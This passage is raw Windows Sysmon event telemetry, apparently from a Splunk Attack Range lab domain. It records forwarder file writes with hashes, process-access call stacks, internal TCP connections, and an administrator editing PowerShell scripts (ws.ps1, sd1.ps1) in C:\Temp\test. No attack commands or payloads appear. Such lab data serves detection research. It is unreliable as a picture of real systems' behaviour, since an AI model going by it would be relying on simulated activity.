Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052508Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:54.216{466BC892-F6F2-60EB-B47D-00000000CF01}4452C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000809316Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:51.464{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57388-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 11241100x80000000000000001052521Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:55.788{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exeC:\Temp\test\ws.ps12021-07-12 07:45:42.455 23542300x80000000000000001052520Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:55.787{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Temp\test\ws.ps1MD5=615C8F3EB8FC071E532A0252BEBCCC80,SHA256=CB8F4133557FB2EFB91D2A3DF7ECD71AD31D41E1F1B3F0C8BC7A996A68578352,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052519Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:55.723{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1C7DDE1C3F798DA52E45E5382435485,SHA256=0110DF78D3DAB522A200B66E3407B8207CB6644413491D84D0369099FF99B604,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809318Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:55.423{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBE27297E4D9714DE9614A1014CB96D3,SHA256=1914A0EF02A6FE9429B67EE8A77DB7EFFA33C2656F29E6E12FDCAAF839502B0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052518Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:55.225{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=40A19937938C06556C73B58BBD938674,SHA256=BDE2DB7FB31C9C468E25E7AD1BB3B5266357DCB7BBAA4909AEFEB8BFD2E61E40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052522Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:56.738{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E1803CFE41DEB255C3BA25AB838906D,SHA256=D08F8253DF70F49050613CE4191DF0DC3FE89FC65AF3985A69EDF83AAABC75B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809319Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:56.423{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADAF6E46002A72096FB92603DC28D75E,SHA256=171C8F471B3FAA822C1FE501B04D1DE46C50E14AC73A9CA9DFEDFA8A354C2602,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052527Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:57.738{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED97C7A6BDE97BF996B131712ECD8F8F,SHA256=77206A5BEF96E571F49EBE1878019492294CDE9D7C7B7E15B94444BEAFB4FB5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809320Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:57.471{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C9D2CB721000CF8B1E3F4D855814373,SHA256=CA6B9F9D971439AED6F20CA5B123DE74E9B23F906D3C84792FF25A31C2007F23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052526Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:57.721{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\fishbucket\splunk_private_db\snapshot.old\snap.datMD5=98CA20429706E9D45D68D72504A914C6,SHA256=F9BCF745A6DFA315C2A0FF52D31E2057193A9B52455457D473C1A185A1B134E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052525Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:57.721{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\fishbucket\splunk_private_db\snapshot.old\btree_records.datMD5=BB1A137FAD500FAAA0FAA3137BC6DD16,SHA256=C748ED42882B16341A1DFBC9B102FDB9179F2974D25EBB832275CDA874A32348,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052524Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:57.721{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\fishbucket\splunk_private_db\snapshot.old\btree_index.datMD5=3426BC127D48B9738296E3B3FA58160E,SHA256=84068203FE8141D2CE833C5E081F5A88488A8D9FD6E92CB917D3901F9B75B5AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052523Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:57.238{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052528Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:58.738{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98ABE0008D2E7E39BDFC77D508325F9C,SHA256=A03535614334C08BEF47646AD9D0B18E7E02C3D4AD4E0D44DC4FACD071C72464,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809321Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:58.474{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=937C42E4321089FB9F2C2B972BE2AFC9,SHA256=3A31CABA222103716659627450F9AD7ACD9D44BDD856A38261AEF3E308465D12,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052531Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:51.772{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51166-false10.0.1.12-8000- 354300x80000000000000001052530Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:50.755{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51165-false10.0.1.12-8089- 23542300x80000000000000001052529Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:59.753{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70314EF9B7F4E27109447DF36F171B80,SHA256=C4131A545FFC63C86E8F1B8EFADAD05C24EA785465D755CEA1E7101A8C597625,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809323Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:59.474{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=671A28E163136D64BC28A6A5339E3BF5,SHA256=358AE3D4AF418890C0B20203FF85F5F0A545E2BA386FC397035D018D91887208,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809322Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:57.354{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57389-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001052532Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:00.787{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8A4E9B9BCA3510A225FDD06A92C83AE,SHA256=DF633C6E2788EEBF66FCB36BEBC8B2F6229E6653CC2A27B82912AC1C6B82DA2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809324Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:00.505{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F251AAA343AB71A5315C3728E7CBA93,SHA256=A79CBA880E2A6C160112B5E9EAA0928D3B4E59E72BE8DE6DA02A1C6AFFA3D80A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052533Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:01.806{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD7879C5D06B479E45A14D295AD89A03,SHA256=F88CB0B42161E7105421D8CD535A371AE26866D25C5312DC86258EC1C1EE8056,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809325Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:01.505{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C845DC7BC507AE0B16935D50A2669C4B,SHA256=1858FDD348EE06EF16E23F8BDD28EC8C5FA4CBC5CF4BD8894F38FC48B254B6F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052534Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:02.836{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43FE0E75562B5E2FE52F63EC8012A5D2,SHA256=1B670B294AF7DC6324C1D13C84083FF84E977EDDB1409996645F2099FFD27CE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809326Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:02.521{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4136CF8455118E7133A8E1702F60F80F,SHA256=556729230BD8A11B1B8109B384118427FD5381FDF852575DB5E94AB101E0D7E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052535Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:03.867{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=984E3E2BD1BF6BF1C7DB843CC502145C,SHA256=028DA54C06D83ADE4B44BA2E639C5B507542F7533040400633064B569C33DB1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809327Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:03.536{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97A4B1DCFE4B144BEABFA4A2475E99C1,SHA256=8A9A7C1DBF3E9E2FCD1B3A900C6294E8963D9769875C4E05B8B83C0EFDAFF9FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052540Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:04.968{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\sd1.ps1@2021-07-12_080204MD5=457BA6A7B9DE05DFC077C1EB0F67637B,SHA256=965DDBC1434AF839D2CBFD5C3E62F734340F809BA912373E1FEF6BCF7E7F8BF1,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001052539Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:04.952{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exeC:\Temp\test\sd1.ps12021-07-12 07:47:36.085 23542300x80000000000000001052538Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:04.952{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Temp\test\sd1.ps1MD5=BB87A22CABB0E1CBFD2B4B30711AA20C,SHA256=FA6EE1E8A154941D13A0F4520798BEDC4C573EFE7A1DA8CF9B2F30182DF2332E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052537Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:04.886{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5282FE460A4BB6A248D33675EB844085,SHA256=E8F486634C41E03E2DF5ABB53F2EB60FDFDF460D3BE454B868B297473C04ED71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809329Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:04.630{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=369D670A8AE046FF0DF446951D63624A,SHA256=3E4A8123F28792AFB636124A4170D2842DC476BFEBD34E1B696380EDA19BADCF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052536Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:04.567{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\session.xmlMD5=3A630F759D9ECA4E17AA87196C18B373,SHA256=5C7DF358A1A2BE2CED8D5E120344B08A5EF736DB779DCD156CC3E15BCABB81EA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809328Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:03.325{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57390-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001052541Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:05.905{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F3CC80DA4EB0967DC393F568131803A,SHA256=0037A651636B755945D6F3CEAAB3FD272663A15D52D8E873FAA04A73D615C250,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809330Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:05.661{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2D3EE2703B2BC12ADF38FDC5F43A200,SHA256=66B84BD852FCBDD6FC3020C93C4B1E024DAED04A070E3ED73F9005565C4E07BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052548Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:06.906{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=778D912426A106BE0E46487EC357B38E,SHA256=46C1833F4BA2E12A899273FE04B8230CE246916894D6750F9EC0B89DD445EE90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809331Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:06.677{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0ABB0EBCEEF1A6B426FCE161130A2056,SHA256=629B6D588FD36BA5D96C5EA7E33D1C814D945C8F6E23B2FCC5A0C82B9F144EE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052547Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:06.422{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052546Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:06.353{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-53D9-60E8-E60F-00000000CF01}3924C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001052545Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:06.353{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-53D9-60E8-E60F-00000000CF01}3924C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001052544Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 08:02:06.353{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.3924.432.101195511C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001052543Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:02:06.353{466BC892-53D9-60E8-E60F-00000000CF01}3924\chrome.3924.432.101195511C:\Program Files\Mozilla Firefox\firefox.exe 354300x80000000000000001052542Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:57.537{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51167-false10.0.1.12-8000- 23542300x80000000000000001052549Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:07.923{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83AB3577EFD83ABBB4D58749B4BDF998,SHA256=5738A164AC634F56CE43625F0A6CCB912F4D70BD1AA53A3DC3D0ED368F59DA66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809332Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:07.708{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFD515D71FFBE247FC1590B5E0266D73,SHA256=CC7BF033585D5F9A6849AC938B1C7C359C9E2EB33E6441B0FE85978E8D0F893E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052557Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:08.938{466BC892-02CE-60E8-7600-00000000CF01}3400NT 